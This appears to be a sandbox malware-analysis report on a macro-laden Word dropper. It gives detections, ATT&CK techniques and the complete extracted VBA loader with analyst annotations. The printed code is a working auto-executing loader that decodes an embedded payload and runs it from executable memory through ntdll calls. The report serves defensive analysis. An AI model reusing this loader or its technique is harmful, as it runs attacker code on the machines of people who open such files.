MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Word document carrying VBA macros (OLE_VBA_MACROS) that ClamAV already flags as Doc.Dropper.Agent-6296402-0. Its `Document_Open` procedure hands control to the loader as soon as the file is opened with macros enabled, so the only user interaction needed is the usual "Enable Content" click. The macro code is obfuscated (random dictionary-word identifiers, song-lyric comments, discarded `VBA.Pmt` calls), but the extracted source is readable end to end: the loader pulls a string out of a control on the embedded UserForm `provided`, undoes a per-character offset (4 on even positions, 3 on odd), base64-decodes it with a home-grown table, allocates an RWX buffer in its own process via `ntdll!NtAllocateVirtualMemory` (MEM_COMMIT, PAGE_EXECUTE_READWRITE), copies the decoded bytes in with `ntdll!ZwWriteVirtualMemory`, and executes them as a `CreateTimerQueueTimer` callback pointing into that buffer (base+1312 on 64-bit Office, base+3152 on 32-bit). The macro itself does not download anything: no HTTP, URLMon, WinHTTP, shell or WScript calls appear in the listing, and the only URLs found are metadata namespaces in the document body. Whether a second stage is fetched is up to the shellcode, which was not analysed here. Techniques supported by the code but missing from the ATT&CK list above: T1204.002 (User Execution: Malicious File), T1106 (Native API — direct Nt/Zw calls), T1620 (Reflective Code Loading) and T1027 (Obfuscated Files or Information). The document body's text about a sextant and a saxophone is lure content unrelated to the macro.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6296402-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6296402-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN: auto-executing `Document_Open` procedure. Matched line in script: `Private Sub Document_Open()` (olevba's snippet also shows the surrounding `End Function` and `Dim dilettant As Integer`). This handler is the trigger that passes control to the loader once macros are enabled; the low severity reflects only the presence of an auto-exec entry point, not what it runs.
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven URLs listed here are XML namespace identifiers (Adobe XMP, RDF, Dublin Core, Photoshop) left in image metadata inside the OLE body, not network destinations; none of them is an indicator of compromise and none should be blocklisted. No URL was reached from the macro code, which matches the absence of any download logic in the extracted VBA (the shellcode it runs may still reach the network). URL http://ns.adobe.com/xap/1.0/ — in document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — in document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — in document text (OLE body)
- http://purl.org/dc/elements/1.1/ — in document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — in document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — in document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef# — in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12912 bytes | fb7b34c66d3e8f7fd5e4546d6d330ae08a065fc571a43c4d1219f6ae20339ce3 |

Note: this hash is of the decoded VBA source text that olevba produced, not of the document itself. It is useful for correlating other samples that carry byte-identical macro text, but it is not a hash of the original file and should be labelled as a derived-artifact hash in any indicator sharing.
Preview script — first 1,000 lines of the extracted script. The listing below ends well before that limit (about 390 lines), so it appears to be the complete extracted source rather than a truncated one. Three modules are concatenated: the document module `ThisDocument` (auto-exec trigger and loader), a standard module `nonfissile` (API declarations and decoder) and the code module of the UserForm `provided`, whose `VB_Base` GUID attribute marks it as a designer module. The form's control data — where the loader reads the encoded payload from (`provided.aegis.SelectedItem.Name`) — is not part of a VBA source dump and must be recovered from the form storage separately.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Analyst annotation (malware sample; do not run outside a sandbox) ---
' Main loader routine, called from Document_Open.  Every identifier is a random
' dictionary word; the `VBA.Pmt ...` statements discard their result and the
' assignments to never-read variables are filler.  Lines marked REAL do the work:
' fetch the encoded payload from a form control, decode it, copy it into RWX
' memory and run it as a timer-queue callback.
Sub largemouth()
Dim clinic As Byte      ' unused
Dim driveler As String  ' unused
' REAL: Day(#12/5/2007#) = 5; selects item 5 (presumably a 0-based index) on control
' `aegis` of the UserForm module `provided`.  The form's designer data is not in this listing.
provided.aegis.Value = Day(#12/5/2007#)
jews = "serpentine"       ' filler
appealable = "cloacina"   ' filler
mendel = "missionary"     ' filler
' REAL: the selected item object; .Value/.SelectedItem/.Name fit a TabStrip or
' MultiPage control - confirm from the form storage.
Set gook = provided.aegis.SelectedItem
adonic = 80
cross = 38873
cantharellus = 531946
VBA.Pmt 0, adonic, 20881, 50155, 4   ' filler: financial function, result discarded
showeryrainy = gook.Name             ' REAL: the item's Name carries the encoded payload text
leiopelmatidae = 91 + 5737           ' = 5828
' REAL: keep the last 5828 characters - exactly the fixed input length canonry() consumes
' (1457 base64 quads); a shorter string would make the decoder index out of range.
midinette = Right(showeryrainy, leiopelmatidae)
crossbar = nonfissile.canonry(midinette)   ' REAL: decode -> raw bytes held in a String
calculating = 80
tailwind = 35755
painting = 152414
VBA.Pmt 0, calculating, 38677, 49939, 7   ' filler
everliving = "denaturalize"               ' filler
#If Win64 Then
Dim hereditament As Integer
Dim bonasa As LongPtr      ' base address of the RWX buffer
Dim firstrate As LongPtr   ' callback address inside the buffer
Dim chordospartium As Long
#Else
Dim involuntary As String
Dim firstrate As Long
Dim outride As String
Dim bonasa As Long
#End If
acidotic = 106 - 106       ' filler
kneel = "listel"           ' filler
adultery = "mead"          ' filler
ivory = 127 - 63 - 72 + 4104   ' filler (= 4096, never used)
adjunct = 98
childcare = 19982
rentable = 311777
VBA.Pmt 0, adjunct, 30644, 50142, 4   ' filler
peltandra = "nevis"
mister = "lonas"
seize = "cryptoprocta"
sozzly = 7
gracilariidae = 26281
ransack = 342615
VBA.Pmt 0, sozzly, 26111, 21770, 5    ' filler
cruzeiro = crossbar                   ' REAL: decoded bytes
templetonia = forelock                ' filler (`forelock` is never assigned)
osiris = "extenuated"                 ' filler
' REAL: allocate RWX memory in this process, copy the decoded bytes in, return the base.
bonasa = autoradiograph(cruzeiro)
cytological = "cohering"              ' filler
#If Win64 Then
Dim pauperis As Variant
Dim candlelighting As LongPtr
Dim via As LongPtr
Dim fever As LongPtr
kneed = 88 + 1224          ' = 1312: entry offset used on 64-bit Office
#Else
Dim candlelighting As Long
entail = 12 + 483          ' = 495
Dim via As Long
Dim fever As Long
kneed = entail + 2657      ' = 3152: entry offset used on 32-bit Office
#End If
Dim convulsions As String
Dim motives As Byte
candlelighting = 100 - 100     ' = 0: used for every NULL argument below
firstrate = bonasa + kneed     ' REAL: callback = buffer base + architecture-specific offset
via = 52 + 127 - 109 + 201457  ' = 201527: dummy initial value; the API writes the timer handle here
fever = 3500                   ' unused
' REAL: rangoon = Kernel32!CreateTimerQueueTimer(&via, TimerQueue=NULL, Callback=firstrate,
' Parameter=NULL, DueTime=0, Period=0, Flags=0) -> the decoded bytes execute as the timer
' callback on a thread-pool thread.  Two different entry offsets suggest the blob carries
' both 32- and 64-bit code paths - confirm by disassembling the decoded buffer.
foundations = rangoon(via, candlelighting, firstrate, candlelighting, candlelighting, candlelighting, candlelighting)
identified = 46
fugaces = 22614
ceratozamia = 498987
VBA.Pmt 0, identified, 14057, 47560, 4   ' filler
End Sub
' Allocates an RWX buffer in the current process and copies the decoded payload
' into it.  `godly` is the decoded String (arrives as a ByRef Variant); the code
' first lifts the BSTR data pointer out of the VARIANT, then copies from it.
' Returns the base address of the new buffer (0 on the ByRef out-parameter if the
' allocation failed - the result is never checked).
Function autoradiograph(godly)
Dim memoria As String
Dim groschen As Variant
Dim unintelligibly As String
Dim posited As Byte
' NOTE(review): this tests `Win64 > 0` whereas other blocks test `Win64` directly;
' the two forms only agree if the compiler constant is positive on 64-bit hosts - TODO confirm.
#If Win64 > 0 Then
Dim surveyintrospection As Integer
Dim mislead As LongPtr   ' receives the payload string's data pointer
viscaceae = 36 - 28      ' = 8: pointer size on x64
Dim ouzo As LongPtr      ' receives the allocation base (ByRef out-parameter)
Dim adversative As Long
Dim manes As String
Dim housedog As LongPtr  ' RegionSize in/out
Dim fawncolored As Integer
#Else
Dim drawstring As Long
Dim mislead As Long
viscaceae = 51 + 22 + 120 - 189   ' = 4: pointer size on x86
Dim ouzo As Long
Dim dairying As String
Dim housedog As Long
Dim cerecloth As Integer
Dim samba As String
#End If
goniometer = VarPtr(mislead)
' cornhusker -> ZwWriteVirtualMemory(-1, &mislead, VarPtr(godly)+8, pointer-size).
' Offset 8 of a VARIANT is its data union on both architectures, so this copies the
' BSTR pointer of the decoded string into `mislead` - a roundabout StrPtr().
ashen = cornhusker(goniometer, VarPtr(godly) + 8, viscaceae)
nomia = -1        ' NtCurrentProcess() pseudo-handle
ouzo = 0          ' BaseAddress = NULL -> kernel chooses the address
aegina = 0        ' ZeroBits
housedog = 9541   ' RegionSize requested (kernel rounds it up to whole pages)
cruel = 4096      ' &H1000 = MEM_COMMIT
collate = 64      ' &H40   = PAGE_EXECUTE_READWRITE
' princeofwalesheath -> ntdll!NtAllocateVirtualMemory(-1, &ouzo, 0, &housedog, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
fuzzy = princeofwalesheath(ByVal nomia, ouzo, ByVal aegina, housedog, ByVal cruel, ByVal collate)
buccaneering = belching    ' filler (`belching` is never assigned)
presentably = boehme * 2   ' filler
' cornhusker -> ZwWriteVirtualMemory(-1, ouzo, mislead, 4370): copy 4370 payload bytes into the
' RWX buffer.  canonry() yields 4371 bytes from its 5828-character input, so all but the last
' byte are copied.
cornhusker ouzo, mislead, 4370
bunchberry = 2
dissatisfaction = 29564
mesmer = 405420
VBA.Pmt 0, bunchberry, 13746, 31951, 2   ' filler
autoradiograph = ouzo   ' base address of the RWX buffer
End Function
' Auto-exec entry point: Word runs this when the document is opened and macros
' are enabled.  The only meaningful statement is the call to largemouth; the
' rest is filler.
Private Sub Document_Open()
Dim dilettant As Integer   ' unused
Dim geebung As Integer     ' unused
transitorily = "madcap"    ' filler
largemouth                 ' REAL: start the loader
delightful = 59
divinity = 33340
relapse = 440714
VBA.Pmt 0, delightful, 31528, 16959, 6   ' filler
End Sub
' Decoy: reads like a copied documentation sample that walks the Access `Forms`
' collection and prints each form name.  Nothing in this listing calls it.
' `Form`/`Forms` belong to the Access object model, not Word; whether this even
' compiles here depends on the project's references and compile-on-demand -
' it is inert either way.
Sub IterateOpenForms()
Dim frm As Form
For Each frm In Forms
'Print the name of the referenced form to the Immediate window
Debug.Print frm.Name
Next frm
End Sub
' Thin wrapper over ZwWriteVirtualMemory on the current process, i.e. a memcpy
' performed through an ntdll syscall stub instead of VBA code:
'   reincarnate = destination address, atrocious = source address, duress = byte count.
' The function never assigns its return value; both call sites ignore it.
Function cornhusker(reincarnate, atrocious, duress)
#If Win64 Then
Dim odylic As Variant
Dim arachis As Variant
Dim irreligiousness As LongPtr   ' process handle
Dim arthrogram As LongPtr        ' destination
Dim convulsively As LongPtr      ' NumberOfBytesWritten (out, never read)
Dim amyotrophia As Integer
Dim anhedonia As LongPtr         ' source
Dim periclase As LongPtr         ' byte count
#Else
Dim arthrogram As Long
Dim everest As Variant
Dim irreligiousness As Long
Dim morosoph As Integer
Dim anhedonia As Long
Dim kaiser As Variant
Dim convulsively As Long
Dim garnish As Byte
Dim periclase As Long
Dim confuted As Long
Dim cantharides As Variant
#End If
presentably = presentably * 4    ' filler
boehme = Rnd(201)                ' filler
arthrogram = reincarnate         ' destination
periclase = duress               ' byte count
boehme = presentably - 83        ' filler
anhedonia = atrocious            ' source
sabreur = 7
ptyas = 27698
sonchus = 300027
VBA.Pmt 0, sabreur, 4365, 18905, 3   ' filler
boehme = boehme - 199            ' filler
irreligiousness = 25 + 25 - 51   ' = -1: NtCurrentProcess() pseudo-handle
' ablepharia -> Ntdll!ZwWriteVirtualMemory(-1, dest, src, size, &written)
ablepharia ByVal irreligiousness, arthrogram, anhedonia, periclase, convulsively
buccaneering = "emptying"        ' filler
End Function
Attribute VB_Name = "nonfissile"
' That vanish into the black sun
' Trying to breathe but there's no air
' --- Analyst annotation: Win32/NT API import table of module `nonfissile` ---
' Every function name is a random word; the real export is the Alias string.  The
' song-lyric comments interleaved below are filler.  `2 = 2` is always True, so the
' condition reduces to `Win64 > 0`; the #Else branch repeats the imports without
' PtrSafe for 32-bit Office (other blocks test `Win64` directly - TODO confirm both
' forms agree on a 64-bit host).
' Only three imports are referenced by the visible code: NtAllocateVirtualMemory
' (princeofwalesheath), ZwWriteVirtualMemory (ablepharia) and CreateTimerQueueTimer
' (rangoon).  CreateEventW, SHChangeNotification_Lock, NtContinue, NtDeleteAtom and
' PathFileExists are declared but never called in this listing - decoys, or support
' for code not present here.  Using the ntdll entry points rather than the kernel32
' wrappers (VirtualAlloc/WriteProcessMemory) is consistent with avoiding user-mode
' hooks on the wrappers - an inference, not something the code states.
' The Lib string "Ntdll.dll " carries a trailing space on four declarations;
' possibly intended to defeat naive matching on "ntdll.dll" - confirm in a sandbox
' that the library still resolves with it.
#If 2 = 2 And Win64 > 0 Then
' Trying to breathe but there's no air
' My heart is bleeding why am I here
' USED by largemouth: executes the decoded bytes as a timer-queue callback.
Public Declare PtrSafe Function rangoon Lib "Kernel32" Alias "CreateTimerQueueTimer" (greene As Any, ByVal measurable As Any, ByVal painter As Any, ByVal synchronous As Any, ByVal cryesthesia As Any, ByVal celtic As Any, ByVal saccharine As Any) As Long
' Taste the last drops of life
' I feel the end is closing in
' unreferenced in this listing
Public Declare PtrSafe Function pianino Lib "Kernel32.dll" Alias "CreateEventW" (ByVal medial As LongPtr,charlotte As LongPtr,ptisan As LongPtr,astrakhan As LongPtr,mudbeplastered As LongPtr) As Long
' Visions of happiness are burning
' Life doesn't work out as planned
' unreferenced in this listing
Public Declare PtrSafe Function coil Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (amethystine As LongPtr, contain As Any,cycad As LongPtr, appalachians As Any) As Boolean
' Try to breathe but there's no air
' To dwell in nothing and forever disappear
' USED by cornhusker: in-process memory copy (also lifts the string pointer out of a VARIANT).
Public Declare PtrSafe Function ablepharia Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal dostoevski As Any, ByVal ingrowth As Any, ByVal ditch As Any, ByVal limitation As Any, ByVal disputation As Any) As LongPtr
' My heart is bleeding why am I here
' Try to breathe but there's no air
' unreferenced in this listing
Public Declare PtrSafe Function ammeter Lib "ntdll.dll" Alias "NtContinue" (methaqualone As LongPtr,burin As LongPtr,catastrophic As LongPtr) As LongPtr
' Visions of happiness are burning
' To dwell in nothing and forever disappear
' unreferenced in this listing
Public Declare PtrSafe Function peptizing Lib "ntdll.dll" Alias "NtDeleteAtom" (carbonated As LongPtr)
' My heart is bleeding why am I here
' Of sorrow slowly killing me
' unreferenced in this listing
Public Declare PtrSafe Function selfexplanatory Lib "Shlwapi.dll" Alias "PathFileExists" (edging As LongPtr) As LongPtr
' Taste the last drops of life
' That vanish into the black sun
' USED by autoradiograph: RWX allocation (MEM_COMMIT, PAGE_EXECUTE_READWRITE) in the current process.
' Parameter 4 is spelled "zodiacalByVal" (a fused name), so it stays ByRef - which is what
' NtAllocateVirtualMemory's PSIZE_T RegionSize needs.
Public Declare PtrSafe Function princeofwalesheath Lib "ntdll.dll " Alias "NtAllocateVirtualMemory" (geant As LongPtr, neve As LongPtr, ByVal shedim As LongPtr,zodiacalByVal As LongPtr, chatoyant As LongPtr, ByVal furnished As LongPtr) As LongPtr
' I feel the end is closing in
' Trying to breathe but there's no air
' Of sorrow slowly killing me
' Dreams that turn into madness
#Else
'
' My heart is bleeding why am I here
' 32-bit variants of the same imports (no PtrSafe, Long instead of LongPtr).
' USED by cornhusker.
Public Declare Function ablepharia Lib "Ntdll.dll " Alias _
"ZwWriteVirtualMemory" (ByVal complicated As Any, ByVal resplendent As Any, ByVal alphabetarian As Any, ByVal lupine As Any, ByVal cebu As Any) As Long
' Dreams that turn into madness
' I feel the end is closing in
' unreferenced in this listing
Public Declare Function amorpha Lib "Shlwapi.dll" Alias "PathFileExists" (bun As Long) As Long
' Trying to breathe but there's no air
' That vanish into the black sun
' USED by autoradiograph.
Public Declare Function princeofwalesheath Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (foresail As Long, delectus As Long, ByVal hygrophorus As Long, crudeByVal As Long, catapultic As Long, ByVal selfgratification As Long) As Long
' That vanish into the black sun
' I can feel my soul leaving me
' unreferenced in this listing
Public Declare Function opinionate Lib "ntdll.dll" Alias "NtDeleteAtom" (culture As Long)
' To dwell in nothing and forever disappear
' To dwell in nothing and forever disappear
' unreferenced in this listing
Public Declare Function homeless Lib "Kernel32.dll" Alias "CreateEventW" (ByVal animate As Long, fendre As Long, bettongia As Long, agar As Long, muscicapa As Long) As Long
' I feel the end is closing in
' That vanish into the black sun
' unreferenced in this listing
Public Declare Function tantalum Lib "ntdll.dll" Alias "NtContinue" (misunderstood As Long, willingly As Long, cahot As Long) As Long
' I can feel my soul leaving me
' That vanish into the black sun
' unreferenced in this listing
Public Declare Function milkcap Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (australasia As Long, saurosuchus As Any, carlock As Long, ledger As Any) As Boolean
'
' Taste the last drops of life
' USED by largemouth.
Public Declare Function rangoon Lib "Kernel32" Alias "CreateTimerQueueTimer" (exalte As Any, ByVal canaille As Any, ByVal cephalosporin As Any, ByVal pixel As Any, ByVal aethusa As Any, ByVal lex As Any, ByVal analbuminemia As Any) As Long
'
' That vanish into the black sun
' I can feel my soul leaving me
' Try to breathe but there's no air
#End If
' That vanish into the black sun
' Trying to breathe but there's no air
' Payload decoder.  `recision` is the 5828-character text taken from the UserForm control.
'   Step 1: StrConv(..., 128) = vbFromUnicode -> one byte per character.
'   Step 2: undo a per-position offset: subtract 4 from even-indexed bytes and 3 from
'           odd-indexed ones (indices 0..5827).
'   Step 3: plain base64 decode using the reverse alphabet from owner() and the shift
'           tables built below (x*64, x*4096, x*262144 are <<6, <<12, <<18).
' Output: 1457 quads -> 4371 bytes written into a 6963-byte buffer, which is returned
' as a String (VBA copies the Byte array straight into it).  The caller then treats
' those bytes as shellcode.  Note the fixed 5828 bound: a shorter input raises a
' subscript error, and a byte below the subtracted offset raises an overflow.
Function canonry(recision) As String
Dim loopline(6962) As Byte   ' output buffer (only the first 4371 bytes are filled)
Dim attractive(63) As Long   ' value << 18 table
Dim strephon As String
Dim expedition As String
Dim asportation(63) As Long  ' value << 12 table
presentably = boehme * 2     ' filler
presentably = Fix(241)       ' filler
Dim callboard As Long
Dim degustation() As Byte    ' working copy of the adjusted input
Dim adelomorphous As String
Dim castrated As Integer
Dim bitis As Long            ' 24-bit group assembled from four sextets
Dim exanthema As Long        ' output write index
Dim adventurous As Long      ' input read index (advances by 4 per iteration)
Dim biddy As Long
Dim melosa(63) As Long       ' value << 6 table
Dim bravado As Variant
disconnection = buccaneering ' filler
Dim bulwer As String
anglais = 258048             ' unused
Dim cylindric As String
mieux = 19 + 65261           ' = 65280 = &HFF00 (mask for output byte 1)
flute = 16711680             ' = &HFF0000 (mask for output byte 0)
himantoglossum = 65536       ' = 2^16 (shift for output byte 0)
edentulous = 57 + 198        ' = 255 (mask for output byte 2)
Dim simulating As Variant
maltster = 64                ' = 2^6
compt = 126 + 3906           ' unused
cestrum = 63                 ' unused
meek = 27 + 36 + 193         ' = 256 = 2^8 (shift for output byte 1)
allars = 262144              ' = 2^18
cracow = 59 - 75 + 4112      ' = 4096 = 2^12
cords = 55 + 73 + 16514944   ' unused
Dim scyphiform As Byte
drosophila = 0               ' unused
jealousyjealousness = 17 - 6 - 47 + 5863   ' unused (= 5827)
Dim ex() As Byte
Dim comitatus As Long
Dim psychically As Byte
ex = StrConv(recision, 128)  ' Step 1: vbFromUnicode -> ANSI byte array
Dim arthrography As Variant
azerbaijani = 29
convention = 10431
topsoil = 455591
VBA.Pmt 0, azerbaijani, 38162, 37103, 2   ' filler
heddle = 5827                     ' last input index (5828 bytes)
nashville = vbKeyShift - 6 - 6    ' = 16 - 12 = 4
' Step 2: even positions -= 4, odd positions -= 3
For abut = 0 To heddle
If abut Mod 2 = 0 Then
ex(abut) = ex(abut) - nashville
Else
ex(abut) = ex(abut) - (nashville - 1)
End If
Next abut
crape = 76
bowels = 15929
basilica = 332147
VBA.Pmt 0, crape, 15229, 21664, 3   ' filler
castrated = 0
anhydride = 0
wrathful = 43
takeup = owner   ' 256-entry reverse base64 alphabet (Byte array)
' Shift tables: melosa = i*64, asportation = i*4096, attractive = i*262144 (acold 47 = multiply)
For biddy = 0 To 63
melosa(biddy) = acold(biddy, maltster, 47)
asportation(biddy) = acold(biddy, cracow, 47)
attractive(biddy) = acold(biddy, allars, 47)
Next biddy
mint = 92
attendant = 20653
tap = 191934
VBA.Pmt 0, mint, 36496, 30552, 2   ' filler
degustation = ex
voiceless = 4
avails = 41
neolamarkism = 39807
bindery = 113610
VBA.Pmt 0, avails, 21537, 13740, 5   ' filler
alder = 3                 ' offset of the 4th character in each quad
exonerate = buccaneering  ' filler
boehme = Math.Round(140)  ' filler
cremona = alder + 1       ' unused
aerolite = 2              ' offset of the 3rd output byte in each triple
' Step 3: one iteration per base64 quad.  `adventurous` is bumped by 3 inside the body and
' by 1 at Next, so it visits 0, 4, 8, ..., 5824 (1457 quads).
For adventurous = 0 To heddle
plethora = degustation(adventurous)         ' c0
asynergic = degustation(adventurous + 2)    ' c2
' bitis = v0<<18 | v1<<12 | v2<<6 | v3 (the table lookups replace the shifts)
bitis = attractive(takeup(plethora)) _
+ asportation(takeup(degustation(adventurous + 1))) + melosa(takeup(asynergic)) + takeup(degustation(adventurous + alder))
biddy = acold(bitis, flute, 39)                         ' bitis And &HFF0000   (acold 39 = And)
loopline(exanthema) = acold(biddy, himantoglossum, 29)  ' \ 65536 -> byte 0    (acold 29 = \)
biddy = acold(bitis, mieux, 39)                         ' bitis And &HFF00
loopline(exanthema + 1) = acold(biddy, meek, 29)        ' \ 256   -> byte 1
loopline(exanthema + aerolite) = acold(bitis, edentulous, 39)   ' bitis And 255 -> byte 2
exanthema = exanthema + aerolite + 1                    ' advance output by 3
adventurous = adventurous + 3                           ' advance input by 3 (+1 from Next)
Next
canonry = loopline   ' Byte array -> String (raw bytes, not re-encoded)
End Function
' Obfuscated binary-operator dispatcher used by canonry():
'   peindre = 29 -> integer division (berber \ inherentessential)
'   peindre = 39 -> bitwise And
'   peindre = 47 -> multiplication
' Any other selector leaves the result Empty (there is no Case Else).
Function acold(berber, inherentessential, peindre)
Select Case peindre
Case 29
acold = berber \ inherentessential
Case 39
acold = berber And inherentessential
Case 47
acold = berber * inherentessential
End Select
End Function
' Wrapper around AscW (UTF-16 code unit of the first character of `decide`).
' Not referenced anywhere in this listing - filler/decoy.
Function bridgehead(decide)
bridgehead = AscW(decide)
End Function
' Decoy: resembles the Word documentation sample that fetches the primary header
' of section 1.  `Dim myHeader As headerFooter` resolves case-insensitively to
' Word's HeaderFooter class; the odd casing most likely comes from the VBA editor
' re-casing the identifier to match this Sub's name.  Never called; inert.
Sub headerFooter()
Dim myHeader As headerFooter
Set myHeader = ActiveDocument.Sections(1).Headers _
(wdHeaderFooterPrimary)
End Sub
' Builds the 256-entry reverse base64 alphabet used by canonry():
'   'A'..'Z' (65..90)  -> 0..25
'   '0'..'9' (48..57)  -> 52..61
'   'a'..'z' (97..122) -> 26..51
'   '/' (47) -> 63,  '+' (43) -> 62
' Every other byte value, including '=' padding, stays 0.  Returned as a Byte array.
Function owner()
Dim wrong(255) As Byte
salsify = 55 + 10   ' = 65 ('A')
Do
wrong(salsify) = salsify - 65
salsify = salsify + 1
Loop Until salsify = 91
salsify = 48        ' '0'
Do
wrong(salsify) = salsify + 4
salsify = salsify + 1
Loop Until salsify = 58
salsify = 97        ' 'a'
Do
wrong(salsify) = salsify - 71
salsify = salsify + 1
Loop Until salsify = 123
wrong(47) = 63      ' '/'
salsify = 43
wrong(salsify) = 62 ' '+'
owner = wrong
End Function
Attribute VB_Name = "provided"
Attribute VB_Base = "0{C931FD74-2016-42E2-AB85-393B31E8E8B7}{5B6EFA3F-FE02-4CB4-BFF4-34EC39CE18FA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False